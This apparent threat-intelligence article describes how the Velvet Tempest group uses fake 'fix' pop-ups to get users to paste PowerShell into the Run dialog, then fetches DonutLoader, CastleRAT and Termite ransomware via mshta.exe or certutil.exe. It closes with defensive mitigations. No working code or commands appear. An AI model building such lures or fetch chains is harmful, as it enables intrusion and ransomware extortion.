Velvet Tempest Deploys Termite Ransomware via ClickFix and CastleRAT

A sophisticated threat actor tracked as Velvet Tempest (also known as Storm-0631) has been observed leveraging a clever social engineering technique to infiltrate corporate networks and deploy Termite Ransomware. According to BleepingComputer, this group—previously associated with the deployment of various malware strains—is now utilizing the ‘ClickFix’ mechanism to facilitate initial access and subsequent Lateral Movement.

The Mechanism of ClickFix Social Engineering Protection

The attack begins when a user visits a compromised website or is redirected via Phishing lures. Instead of traditional file downloads, the group employs the ClickFix TTP, which displays a fraudulent overlay designed to look like a browser error or a system troubleshooting prompt. The pop-up informs the victim that a ‘fix’ is required to view the page and instructs them to copy a PowerShell script to their clipboard and execute it manually via the Windows Run dialog (Win+R).

By convincing the user to execute the code themselves, the attackers bypass many EDR protections that primarily focus on automated browser-based downloads. This social engineering tactic shifts the burden of execution to the user, making it harder for automated systems to distinguish between legitimate administrative tasks and malicious activity. Organizations must focus on ClickFix social engineering protection by educating users never to run terminal commands or PowerShell scripts provided by external websites.

Payload Analysis: DonutLoader and CastleRAT

Once the victim executes the obfuscated PowerShell command, it utilizes legitimate Windows binaries such as mshta.exe or certutil.exe to pull down further payloads from C2 infrastructure. One of the primary tools in this stage is DonutLoader, a shellcode injector that allows for the execution of VBScript, JScript, or .NET assemblies in memory without writing files to disk.

DonutLoader is subsequently used to deploy CastleRAT, a remote access trojan that grants Velvet Tempest persistent access to the host. Researchers note that CastleRAT provides extensive capabilities for data exfiltration, system monitoring, and facilitating the deployment of additional tools required for the final stages of the attack. Understanding how to detect CastleRAT malware requires the SOC to monitor for unusual network connections originating from living-off-the-land binaries and unexpected persistence mechanisms in the registry.

From Initial Access to Termite Ransomware

Velvet Tempest does not stop at data collection. After establishing a foothold, the group performs internal reconnaissance to identify high-value targets and backup servers. This Lateral Movement phase often involves the use of legitimate tools and compromised credentials to avoid triggering security alerts.

The final objective in the observed campaigns is the deployment of Termite ransomware. This strain is designed to encrypt sensitive data and demand a significant payment for the decryption key. The integration of ClickFix lures with high-impact ransomware highlights the group’s intent to maximize the financial ROI of their operations. This shift suggests that Velvet Tempest may be operating as an APT for financial gain or as an affiliate in a broader ransomware-as-a-service ecosystem.

Velvet Tempest Ransomware Mitigation and Detection Strategies

Defending against these multi-stage attacks requires a layered approach aligned with the MITRE ATT&CK framework. Effective Velvet Tempest ransomware mitigation starts with restricting user permissions and hardening the PowerShell environment.

• Execution Policies: Enforce ‘AllSigned’ or ‘Restricted’ PowerShell execution policies via Group Policy to prevent the execution of untrusted scripts.
• Command Line Logging: Enable Script Block Logging (Event ID 4104) to provide visibility into the actual commands being executed, even if they are obfuscated.
• Living-off-the-Land Monitoring: Use SIEM rules to flag instances of mshta.exe or certutil.exe communicating with unknown external IP addresses, as these are frequently used by DonutLoader for payload retrieval.
• User Training: Conduct simulations focusing on the ClickFix technique to ensure employees recognize that legitimate software updates never require manual command execution in the Windows Run box.